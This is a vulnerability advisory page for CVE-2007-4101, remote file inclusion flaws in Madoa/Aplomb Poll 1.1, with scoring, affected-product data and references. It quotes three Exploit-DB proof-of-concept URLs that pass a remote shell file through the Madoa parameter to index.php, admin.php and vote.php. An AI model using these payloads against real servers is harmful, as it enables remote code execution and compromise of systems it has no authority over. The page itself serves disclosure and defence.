CVE-2007-4101
published 2007-07-31
CVE-2007-4101: Multiple PHP remote file inclusion vulnerabilities in Madoa Poll 1.1 allow remote attackers to execute arbitrary PHP code via the Madoa parameter to (1)…
Priority: P3, 39, medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.91% (85.2th percentile)
Multiple PHP remote file inclusion vulnerabilities in Madoa Poll 1.1 allow remote attackers to execute arbitrary PHP code via the Madoa parameter to (1) index.php, (2) vote.php, and (3) admin.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| global_centre | aplomb_poll | — | — |
No detection rules found.
Exploit-DB
Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion
exploitdb·2007-07-30
---
source: https://www.securityfocus.com/bid/25138/info
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?Madoa=http://sheel.txt?
Exploit-DB
Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion
exploitdb·2007-07-30
---
source: https://www.securityfocus.com/bid/25138/info
http://www.example.com/admin.php?Madoa=http://shell.txt?
Exploit-DB
Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion
exploitdb·2007-07-30
---
source: https://www.securityfocus.com/bid/25138/info
http://www.example.com/vote.php?Madoa=http://sheel.txt?
No writeups or analysis indexed.
http://osvdb.org/37262
http://osvdb.org/37263
http://osvdb.org/37264
http://securityreason.com/securityalert/2937
http://www.attrition.org/pipermail/vim/2007-July/001739.html
http://www.securityfocus.com/archive/1/475096/100/0/threaded
http://www.securityfocus.com/bid/25138